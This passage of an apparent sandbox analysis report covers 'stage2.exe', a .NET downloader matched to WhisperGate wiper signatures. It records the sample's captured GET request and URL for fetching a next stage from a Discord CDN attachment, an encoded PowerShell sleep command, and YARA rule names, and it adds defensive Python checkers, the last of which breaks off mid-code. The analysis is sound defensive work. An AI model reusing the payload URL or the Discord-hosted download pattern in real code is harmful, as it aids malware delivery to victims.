Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

Networking:

Yara detected MSILDownloaderGeneric
Source: Yara match File source: Process Memory Space: stage2.exe PID: 7084, type: MEMORYSTR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1
    Host: cdn.discordapp.com
    Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: global traffic HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Mon, 17 Jan 2022 01:25:24 GMT
    Content-Type: application/xml; charset=UTF-8
    Content-Length: 223
    Connection: close
    CF-Ray: 6cebca1adc534a68-FRA
    Cache-Control: private, max-age=0
    Expires: Mon, 17 Jan 2022 01:25:24 GMT
    Vary: Accept-Encoding
    CF-Cache-Status: MISS
    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRA
    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
Source: stage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmp String found in binary or memory: http://cdn.discordapp.com
Source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.339502555.0000000000FB3000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.426449347.0000000000DCD000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png$
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Amcache.hve.26.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$
Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com
Source: stage2.exe String found in binary or memory: https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com4
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester$
Source: powershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemetry)
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected:
    GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1
    Host: cdn.discordapp.com
    Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
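The only request the sample makes carries just a Host and a Connection header, and the CDN answered it with 403 Forbidden, so the next stage was not retrieved during this run and the behaviour recorded on this page is that of the downloader alone. The following Python checker is an added example, not part of the Joe Sandbox report and not code from the sample: it parses a raw HTTP/1.1 request and flags the traits this section records, a missing User-Agent (consistent with a .NET WebClient/HttpWebRequest caller that never sets one; the sample is a .NET assembly) and a download from a Discord CDN attachment path whose file name ends in an image extension. The captured request is rebuilt from the line above with its CRLF line breaks restored; the benign control request is constructed for the example.

```python
import re

# Request as captured in this report, with the CRLF line breaks restored.
CAPTURED_REQUEST = (
    "GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1\r\n"
    "Host: cdn.discordapp.com\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed control: what a browser-style client would send.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

# Discord attachment path: channel snowflake / attachment snowflake / file name.
DISCORD_ATTACHMENT = re.compile(r"^/attachments/\d{17,20}/\d{17,20}/[^/\s]+$")
# Extensions commonly used to make a hosted payload look like a harmless file.
DISGUISE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif", ".bmp", ".pdf", ".txt")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, version, headers).

    Header names are lower-cased so lookups are case-insensitive.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def assess_request(raw):
    """Return the list of findings for one request (empty list = nothing notable)."""
    method, path, _version, headers = parse_request(raw)
    findings = []
    if "user-agent" not in headers:
        # .NET WebClient/HttpWebRequest send no User-Agent unless the caller sets one.
        findings.append("no User-Agent header")
    if method in ("GET", "POST") and "accept" not in headers:
        findings.append("no Accept header")
    if headers.get("host", "").lower() == "cdn.discordapp.com" and DISCORD_ATTACHMENT.match(path):
        findings.append("Discord CDN attachment download")
        filename = path.rsplit("/", 1)[-1].lower()
        if filename.endswith(DISGUISE_EXTENSIONS):
            findings.append("attachment named as a non-executable file: " + filename)
    return findings


if __name__ == "__main__":
    for label, req in (("captured", CAPTURED_REQUEST), ("control", BENIGN_REQUEST)):
        print(label, assess_request(req))
```

The host match is deliberately exact: Discord attachments are legitimate traffic on most networks, so the findings are meant to be combined (no User-Agent plus an attachment download from a freshly started process), not alerted on individually.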

System Summary:

Uses 32bit PE files
Source: stage2.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: stage2.exe, type: SAMPLE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: stage2.exe, type: SAMPLE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: stage2.exe, type: SAMPLE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Source: Process Memory Space: powershell.exe PID: 7160, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7140, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
One or more processes crash
Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04A6CB10 2_2_04A6CB10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E75768 2_2_07E75768
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E76728 2_2_07E76728
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E78320 2_2_07E78320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E78310 2_2_07E78310
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E79058 2_2_07E79058
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E71B88 2_2_07E71B88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E78320 2_2_07E78320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E79820 2_2_07E79820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07EA7E00 2_2_07EA7E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07EA7E00 2_2_07EA7E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E71B78 2_2_07E71B78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3DFA8 13_2_07A3DFA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3F278 13_2_07A3F278
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A341F0 13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A30040 13_2_07A30040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A341F0 13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3EF20 13_2_07A3EF20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A341F0 13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A341F0 13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A341F0 13_2_07A341F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A30040 13_2_07A30040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A67E00 13_2_07A67E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A67E00 13_2_07A67E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080D8C28 13_2_080D8C28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080D8C18 13_2_080D8C18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080DA6B8 13_2_080DA6B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080DA6B2 13_2_080DA6B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3A16F 13_2_07A3A16F
Sample file is different than original file name gathered from version info
Source: stage2.exe, 00000001.00000000.439903603.0000000000EA8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
Source: stage2.exe, 00000001.00000002.480852082.000000000161A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
Source: stage2.exe, 00000001.00000000.438479767.000000000161A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
Source: stage2.exe Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
PE file contains strange resources
Source: stage2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE / OLE file has an invalid certificate
Source: stage2.exe Static PE information: invalid certificate
Source: stage2.exe Virustotal: Detection: 44%
Source: stage2.exe ReversingLabs: Detection: 48%
Source: C:\Users\user\Desktop\stage2.exe File read: C:\Users\user\Desktop\stage2.exe Jump to behavior
Source: stage2.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\stage2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\stage2.exe "C:\Users\user\Desktop\stage2.exe"
Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== Jump to behavior
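The -enc argument is base64 over UTF-16LE text. Decoded, UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== is Start-Sleep -s 10: the command line that fires both Sigma rules above is a ten-second delay, not a payload, which fits the sleep-based evasion signatures listed for this sample rather than a download cradle. The decoder and process-creation check below are an added example, not code from the report or from the sample: the event records are constructed from the command lines on this page plus two benign controls, and the field names parent and cmdline are the example's own.

```python
import base64
import re


def encode_command(text):
    """Produce a PowerShell -EncodedCommand value: base64 over UTF-16LE text."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(value):
    """Reverse encode_command. Raises ValueError on bad base64 or odd length."""
    raw = base64.b64decode(value, validate=True)
    if len(raw) % 2:
        raise ValueError("not UTF-16LE: odd byte count")
    return raw.decode("utf-16-le")


# Constructed process-creation records modelled on this report's process tree
# (stage2.exe spawning powershell.exe with -enc) plus two benign controls.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\stage2.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                "-enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA=="},
    {"parent": r"C:\Windows\explorer.exe",
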